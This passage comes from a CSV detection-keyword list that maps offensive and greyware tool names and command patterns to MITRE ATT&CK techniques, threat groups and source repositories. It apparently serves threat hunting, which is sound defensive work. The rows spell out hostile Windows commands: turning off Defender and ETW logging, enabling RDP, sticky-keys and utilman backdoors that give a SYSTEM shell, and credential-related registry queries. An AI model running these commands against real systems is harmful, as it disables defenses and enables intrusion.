TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveDll.*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*ReflectiveDll.x64.dll*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" +"*ReflectiveDll.x86.dll*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" +"*ReflectiveDLLInjection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveDLLInjection.*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*ReflectiveDLLInjection.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*ReflectiveDLLInjection.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveDllInjection.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Reflective-HackBrowserData*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"*Reflective-HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*ReflectiveLoader.*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*ReflectiveLoader.c*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveLoader.c*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*ReflectiveLoader.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveLoader.h*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*ReflectiveNTDLL.cpp*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*ReflectiveNTDLL.exe*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*ReflectiveNTDLL.sln*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*ReflectiveNTDLL.vcxproj*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*ReflectiveNtdll-main*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*ReflectivePick_x64_orig.dll*","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1112","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ReflectivePick_x86_orig.dll*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1113","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*RefleXXion*ntdll.dll*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" +"*RefleXXion.sln*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" +"*RefleXXion-DLL*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" +"*RefleXXion-EXE*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" +"*RefleXXion-main*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" +"*reg add *HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server* /v fDenyTSConnections /t REG_DWORD /d 0 /f*","greyware_tool_keyword","reg","Allowing remote connections to this computer","T1021.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","7","7","N/A","N/A","N/A","N/A" +"*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*","greyware_tool_keyword","reg","Hit F5 a bunch of times when you are at the RDP login screen","T1546.012 - T1059.003 - T1055.001","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*","greyware_tool_keyword","reg","At the login screen press Windows Key+U and you get a cmd.exe window as SYSTEM.","T1546.012 - T1059.003 - T1055.001","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*reg add *HKLM\SOFTWARE\Policies\Microsoft\Windows Defender""* /v DisableAntiSpyware /t REG_DWORD /d 1 /f*","greyware_tool_keyword","reg","Defense evasion technique disable windows defender","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*reg add *HKLM\Software\Policies\Microsoft\Windows Defender""*/v *DisableAntiSpyware* /t REG_DWORD /d *1* /f*","greyware_tool_keyword","reg","Disable Real Time Protection","T1562.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg add *HKLM\Software\Policies\Microsoft\Windows Defender* /v *DisableAntiVirus* /t REG_DWORD /d *1* /f*","greyware_tool_keyword","reg","Disable Real Time Protection","T1562.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg add *HKLM\Software\Policies\Microsoft\Windows Defender* /v Disable* /t REG_DWORD /d 1 /f*","greyware_tool_keyword","reg","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg add *HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters* /v EnablePrefetcher /t REG_DWORD /f /d 0*","greyware_tool_keyword","reg","Anti forensic - Disabling Prefetch","T1215 - T1562.001 - T1037","TA0008","N/A","N/A","Defense Evasion","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*reg add *HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger* /v *Start* /t REG_DWORD /d *0* /f*","greyware_tool_keyword","reg","Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions","T1562.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","7","N/A","N/A","N/A","N/A" +"*reg add *HKLM\System\CurrentControlSet\Services\SecurityHealthService* /v *Start* /t REG_DWORD /d *4* /f*","greyware_tool_keyword","reg","Disable Windows Defender Security Center","T1562.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*REG ADD *igfxCUIService*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg add HKCU\software\policies\microsoft\office\16.0\excel\security /v PythonFunctionWarnings /t REG_DWORD /d 0 /f?*","greyware_tool_keyword","Excel","prevent any warnings or alerts when Python functions are about to be executed. Threat actors could run malicious code through the new + Microsoft Excel feature that allows Python to run within the spreadsheet","T1112 - T1131 - T1204.002","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml","1","0","N/A","7","1","88","10","2023-09-13T20:39:02Z","2022-01-11T07:34:37Z" +"*reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d *","greyware_tool_keyword","reg","Disable Cortex: Change the DLL to a random value","T1547.001 - T1055.001 - T1055.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A" +"*reg delete *HKLM\Software\Policies\Microsoft\Windows Defender* /f*","greyware_tool_keyword","reg","Disable Real Time Protection","T1562.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f*","offensive_tool_keyword","reg","Delete run box history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*reg query ""HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON"" /v CACHEDLOGONSCOUNT*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*reg query hkcu\software\*\putty\session*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL*","greyware_tool_keyword","reg","Check if LSASS is running in PPL","T1012 - T1003.003","TA0009 - TA0006","N/A","N/A","Reconnaissance","https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL*","greyware_tool_keyword","reg","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","Checking For Hidden Credentials With Appcmd.exe","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*reg query hklm\software\OpenSSH*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg query hklm\software\OpenSSH\Agent*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high 